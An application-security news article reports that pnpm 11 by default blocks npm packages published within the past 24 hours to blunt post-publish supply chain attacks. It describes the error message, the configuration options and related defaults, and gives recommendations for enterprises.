πŸ’» AppSec

pnpm 11 Defaults to 24-Hour Package Age Minimum β€” Blocking Automated Post-Publish Supply Chain Attacks

pnpm 11, released this week, introduces a package quarantine feature that by default blocks installation of any npm package published within the past 24 hours. The control targets the automated post-publish compromise pattern used by TeamPCP, CanisterSprawl, and similar supply chain threat actors who publish malicious package versions and immediately trigger mass installation before defenders can respond. It is the most substantive supply-chain-defensive default configuration added to a package manager since npm's provenance attestation.

4 min read
#pnpm#npm#supply-chain#package-manager#developer-security#open-source#dependency-management#security-defaults

pnpm β€” the high-performance npm-compatible package manager used by millions of JavaScript developers β€” has released version 11.0 with a significant security default: packages published to the npm registry within the past 24 hours are quarantined and not installable by default. Developers who need to install a newly published package must explicitly override the quarantine with a flag acknowledging the age of the package.

Why Package Age Is a Security Signal

The 24-hour quarantine targets a specific attack pattern that has been used in multiple high-profile supply chain attacks: automated post-publish compromise, in which an attacker publishes a malicious package (or compromises an existing package and publishes a new malicious version) and relies on the period before detection to maximise installation volume.

The window between a malicious package being published and security tooling being updated to flag it is typically measured in hours. Key examples from recent history:

  • @bitwarden/cli (TeamPCP, April 2026): Malicious version published, approximately 90-minute window before npm removed it β€” but within that window, automated CI/CD systems triggered fresh installs
  • axios v1.14.1 (Sapphire Sleet, March 2026): Three-hour window; automated workflows installing pinned dependencies triggered the compromise
  • SAP @sap namespace (April 2026): 52-hour exposure window, but peak installation velocity was in the first 24 hours

The common thread is that automated CI/CD systems and developer workflows that install packages immediately following publication are the primary amplification mechanism. If no package manager installs a package in the first 24 hours, the attacker gains nothing from rapid publication.

How the Quarantine Works

By default, pnpm 11 checks the _time field in the npm registry metadata for each package being installed. If the latest matching version was published within the past 24 hours, pnpm blocks the installation with an explicit error:

ERR_PNPM_NEW_PACKAGE_RISK Package <name>@<version> was published 2 hours ago.
Installing packages published within 24 hours is blocked by default.
To install anyway: pnpm install --allow-new-packages

The quarantine applies to:

  • Direct dependency installation
  • Transitive dependency resolution when a new version was published within 24 hours
  • pnpm add commands for newly published packages

Configurable period: The 24-hour default can be adjusted in .npmrc via the package-quarantine-days setting. Organisations may choose to extend this to 48 or 72 hours for higher-security environments.

Exemption for pinned versions: Packages explicitly pinned to a specific version hash in pnpm-lock.yaml are exempt from the age check β€” since the hash verification provides an equivalent guarantee.

Additional Security Defaults in pnpm 11

The quarantine feature is the most significant new security control, but pnpm 11 includes two additional supply-chain-relevant defaults:

Exotic sub-dependency blocking: pnpm 11 by default blocks installation of packages from non-standard registries when they appear as transitive dependencies β€” preventing dependency confusion attacks where an internal package name is squatted on the public npm registry.

install script auditing: pnpm 11 logs all preinstall, install, and postinstall scripts that execute during dependency installation, providing an audit trail for supply chain security reviews.

Implications for Enterprises Using pnpm

For organisations using pnpm in their JavaScript development and CI/CD pipelines:

Upgrade to pnpm 11: The quarantine feature’s value compounds with adoption. CI/CD pipelines running pnpm install are the primary beneficiary β€” they run on schedules that may execute a fresh install within hours of a malicious package being published.

Configure the quarantine period: Evaluate whether 24 hours is appropriate or whether a longer quarantine (48–72 hours) better matches your organisation’s security requirements and development cadence.

Test the override workflow: Developers occasionally need to install freshly published packages for legitimate reasons (a patch they are waiting for, a package they maintain themselves). Ensure your teams know the override flag and that there is a documented process for legitimate exceptions.

The 24-hour quarantine is a pragmatic, immediately deployable supply chain defence. It will not prevent attacks that operate on a timescale longer than 24 hours, but it eliminates the zero-hour publication window that has been the most exploited attack vector in npm supply chain attacks. Adopting pnpm 11 is one of the most concrete supply chain defence improvements a JavaScript development team can make this week.

Share this article